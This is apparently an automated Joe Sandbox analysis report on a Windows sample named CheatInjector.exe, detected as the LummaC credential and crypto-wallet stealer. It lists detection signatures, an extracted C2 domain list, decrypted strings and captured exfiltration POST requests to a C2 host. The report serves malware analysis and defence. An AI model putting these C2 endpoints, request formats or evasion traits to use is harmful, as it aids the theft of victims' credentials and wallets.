Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
CheatInjector.exe

Overview

General Information

Sample name:CheatInjector.exe
Analysis ID:1542679
MD5:9fb7da682b76acbdf560398aa193ff7a
SHA1:200ec14a4c59576f288b3f86021d0d4b7c16bcf5
SHA256:a37043d7bbd6e5f0f5e9caddc36de161c5287041cc46b09891f0ce65064de870
Tags:exeuser-KnownStormChaser
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for sample
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • CheatInjector.exe (PID: 2996 cmdline: "C:\Users\user\Desktop\CheatInjector.exe" MD5: 9FB7DA682B76ACBDF560398AA193FF7A)
    • CheatInjector.exe (PID: 2892 cmdline: "C:\Users\user\Desktop\CheatInjector.exe" MD5: 9FB7DA682B76ACBDF560398AA193FF7A)
    • WerFault.exe (PID: 736 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2996 -s 280 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["necklacedmny.store", "fadehairucw.store", "scriptyprefej.store", "founpiuer.store", "thumbystriw.store", "navygenerayk.store", "crisiwarny.store", "presticitpo.store", "prinyveri.cfd"], "Build id": "LPnhqo--qgfvqmqriubx"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000001.00000003.1832867124.0000000001624000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      Process Memory Space: CheatInjector.exe PID: 2892JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: CheatInjector.exe PID: 2892JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: CheatInjector.exe PID: 2892JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
            decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-26T07:01:09.388235+020020546531A Network Trojan was detected192.168.2.449730104.21.95.91443TCP
              2024-10-26T07:01:10.712187+020020546531A Network Trojan was detected192.168.2.449732104.21.95.91443TCP
              2024-10-26T07:01:23.128913+020020546531A Network Trojan was detected192.168.2.449746104.21.95.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-26T07:01:09.388235+020020498361A Network Trojan was detected192.168.2.449730104.21.95.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-26T07:01:10.712187+020020498121A Network Trojan was detected192.168.2.449732104.21.95.91443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-26T07:01:14.734353+020020480941Malware Command and Control Activity Detected192.168.2.449738104.21.95.91443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: CheatInjector.exeAvira: detected
              Found malware configuration
              Source: 1.2.CheatInjector.exe.400000.0.unpackMalware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "fadehairucw.store", "scriptyprefej.store", "founpiuer.store", "thumbystriw.store", "navygenerayk.store", "crisiwarny.store", "presticitpo.store", "prinyveri.cfd"], "Build id": "LPnhqo--qgfvqmqriubx"}
              Multi AV Scanner detection for domain / URL
              Source: prinyveri.cfdVirustotal: Detection: 16%Perma Link
              Multi AV Scanner detection for submitted file
              Source: CheatInjector.exeReversingLabs: Detection: 47%
              Source: CheatInjector.exeVirustotal: Detection: 57%Perma Link
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.4% probability
              Machine Learning detection for sample
              Source: CheatInjector.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: prinyveri.cfd
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.1936618564.00000000004EF000.00000004.00000001.01000000.00000003.sdmpString decryptor: LPnhqo--qgfvqmqriubx
              Source: CheatInjector.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49738 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49740 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49744 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.95.91:443 -> 192.168.2.4:49746 version: TLS 1.2
              Source: CheatInjector.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 0_2_004DB239 FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_004DB239
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov byte ptr [edi], al0_2_00520059
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00510178
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx edx, byte ptr [esi+ebx]0_2_004F4190
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov edx, ecx0_2_00530250
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ecx, eax0_2_004FC230
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov eax, edx0_2_00532366
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov dword ptr [ebp-18h], edi0_2_00532366
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov eax, dword ptr [edi+0Ch]0_2_004F4440
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ecx, eax0_2_0051E435
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ecx, eax0_2_0051E4CB
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ecx, eax0_2_0051E4FB
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx ebx, bx0_2_005184BB
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx edi, byte ptr [ebx]0_2_00530555
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movsx ecx, byte ptr [edx]0_2_00530555
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then jmp eax0_2_0051051C
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ecx, eax0_2_0051E50B
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov word ptr [eax], cx0_2_00516690
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov word ptr [ebx], cx0_2_0050E780
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx ecx, word ptr [eax]0_2_0050E780
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov byte ptr [edi], cl0_2_0051E895
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ecx, eax0_2_00518990
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then jmp ecx0_2_0051AABE
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp byte ptr [esi+eax+01h], 00000000h0_2_0051AB1E
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ecx, eax0_2_0051EC6D
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov byte ptr [edi], al0_2_0051EC6D
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then xor eax, eax0_2_004FCC3F
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx edx, word ptr [ecx+eax]0_2_00510D50
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp dword ptr [ebx+edx*8], 50DC24C7h0_2_00532D70
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx ebx, byte ptr [edx]0_2_00526DA0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-336243D6h]0_2_0051AE2E
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]0_2_0051CEE0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], BA50DEFCh0_2_0052CFE0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx edx, byte ptr [esi+edi]0_2_004F30C0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h0_2_00533240
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp word ptr [ebp+edi+02h], 0000h0_2_00515280
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ecx, eax0_2_00533350
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp dword ptr [ebx+esi*8], FD743AC4h0_2_0052D370
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov eax, ecx0_2_004FD3E0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov edx, dword ptr [esi+2Ch]0_2_0050D45F
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp byte ptr [esi+ebx], 00000000h0_2_0051D470
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then push edi0_2_0050D437
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov dword ptr [eax+ebx], 30303030h0_2_004EF430
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov dword ptr [eax+ebx], 20202020h0_2_004EF430
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx+23C7B520h]0_2_005194D0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ecx, eax0_2_0052D4C0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 3E416E49h0_2_0052D4C0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ecx, eax0_2_0052D4C0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp dword ptr [edi+edx*8], 3E416E49h0_2_0052D4C0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp dword ptr [ecx+edi*8], DD26B4F7h0_2_005335E0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx ebx, byte ptr [ecx+esi]0_2_004F5650
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx ecx, byte ptr [ebp+eax-3ADE0060h]0_2_0052F6BD
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], B62B8D10h0_2_0051B75D
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then jmp dword ptr [0044CA98h]0_2_0051B75D
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov byte ptr [eax+ebx], 00000030h0_2_004EF705
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-00000095h]0_2_00519850
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ebx, eax0_2_0051F821
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_0051F821
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp word ptr [ebx+eax+02h], 0000h0_2_0050B826
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp dword ptr [edx+ecx*8], 3602324Eh0_2_005338C0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp dword ptr [ebp+esi*8+00h], 3602324Eh0_2_005338C0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov edx, ecx0_2_004FD9BD
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-0D63F9F0h]0_2_00533BA0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then cmp dword ptr [ebp+ecx*8+00h], C0A4C970h0_2_00533BA0
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov word ptr [ecx], dx0_2_0050DBAD
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov ebx, ecx0_2_0050BC6A
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then mov edx, ecx0_2_0051DD30
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx edi, byte ptr [esi+ecx+41h]0_2_004FDDD8
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then push esi0_2_00513E33
              Source: C:\Users\user\Desktop\CheatInjector.exeCode function: 4x nop then movzx eax, byte ptr [esp+edx+64h]0_2_004FBEA0

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49746 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49738 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.95.91:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.95.91:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Malware configuration extractorURLs: prinyveri.cfd
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 54Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 18170Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8791Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20444Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1262Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 553526Host: crisiwarny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 89Host: crisiwarny.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: prinyveri.cfd
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: crisiwarny.store
              Source: CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net
              Source: CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: CheatInjector.exe, 00000001.00000003.1833295772.0000000003C4F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: CheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
              Source: CheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
              Source: CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: CheatInjector.exe, 00000001.00000003.1794281368.0000000003C67000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: CheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg
              Source: CheatInjector.exe, 00000001.00000003.1834901251.0000000001654000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: CheatInjector.exe, 00000001.00000002.1919006642.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1832685841.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1867233180.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1850294553.0000000001624000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1817066637.0000000003C2F000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1816620533.0000000003C2E000.00000004.00000800.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1849923534.0000000003C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/
              Source: CheatInjector.exe, 00000001.00000003.1816674082.0000000001658000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/N
              Source: CheatInjector.exe, 00000001.00000003.1881011106.0000000003C2F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/V
              Source: CheatInjector.exe, 00000001.00000003.1832867124.000000000163F000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1833119016.0000000001654000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1816723639.0000000001624000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1853322877.0000000001645000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1916727727.000000000159C000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1881229138.0000000001645000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1850294553.000000000163F000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1833503684.0000000001654000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1816723639.000000000163F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api
              Source: CheatInjector.exe, 00000001.00000003.1881229138.0000000001645000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api#2
              Source: CheatInjector.exe, 00000001.00000002.1917876734.000000000159C000.00000004.00000020.00020000.00000000.sdmp, CheatInjector.exe, 00000001.00000003.1916727727.000000000159C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/api/
              Source: CheatInjector.exe, 00000001.00000002.1918562210.0000000001648000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store/apiA2?
              Source: CheatInjector.exe, 00000001.00000003.1793599101.000000000162B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crisiwarny.store:443/api
